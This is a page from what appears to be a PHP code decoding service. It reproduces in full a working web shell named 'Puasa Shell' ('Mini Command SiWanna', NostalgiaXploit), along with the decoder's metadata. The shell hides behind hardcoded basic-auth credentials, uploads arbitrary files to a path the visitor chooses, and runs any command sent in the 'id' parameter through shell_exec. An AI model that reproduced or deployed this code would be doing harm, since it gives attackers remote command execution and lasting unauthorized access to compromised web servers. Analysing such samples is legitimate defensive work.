Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ?><?php // --- pop-up $user = "siwanna"; $pass = "nostalgiaxploit"; if (($_..

Decoded Output download

Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686 
None

Did this file decode correctly?

Original Code

<?php ?><?php
// --- pop-up     
$user = "siwanna";
$pass = "nostalgiaxploit";
if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass)) {
    header("WWW-Authenticate: Basic realm=\"nostalgiaxploit\"");
    header("HTTP/1.0 401 Unauthorized");
    exit();
}
?>
<title>Puasa Shell</title>
<font color="lime"><body bgcolor="black"><pre>
+------------------------+
  Mini Command SiWanna
+------------------------+
     NostalgiaXploit

 ___________________________
< root@nostalgiaxploit:~# Thanks You >
 ---------------------------
   \         ,        ,
    \       /(        )`
     \      \ \___   / |
            /- _  `-/  '
           (/\/ \ \   /\
           / /   | `    \
           O O   ) /    |
           `-^--'`<     '
          (_.)  _  )   /
           `.___/`    /
             `-----' /
<----.     __ / __   \
<----|====O)))==) \) /====>
<----'    `--' `.__,' \
             |        |
              \       /
        ______( (_  / \______
      ,'  ,-----'   |        \
      `--{__________)        \/
   ------------------------<br>
#Uname -a: <?php echo php_uname() . "
"; ?>
#Server: <?=$_SERVER['HTTP_HOST'] . "
"; ?>
#Shell Ini Berada Pada [dir]: <?php echo getcwd(); ?>/<?php $current_file_name = basename($_SERVER['PHP_SELF']);
echo $current_file_name . "
"; ?>
</pre>
<?php
$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<a href='$fullpath' target='_blank'>Akses untuk $fullpath</a>";
    }
}
echo '<form method=POST enctype="multipart/form-data" action=""><input type="file" name="files"><input type=submit value="Cruz!"></form></body></html>'; ?>
<form method=GET Action="">
<?=$_SERVER['SERVER_ADDR'] ?>:~$<font size="3">
<INPUT TYPE="text" NAME="id">
<INPUT TYPE="submit" VALUE="Hajar">
<pre>
<?php echo shell_exec($_GET['id'] . ' 2>&1'); ?>
</pre>

Function Calls

getcwd 1
php_uname 1

Variables

$pass nostalgiaxploit
$user siwanna

Stats

MD5 6d955bedcb298117638c05025abc5855
Eval Count 0
Decode Time 143 ms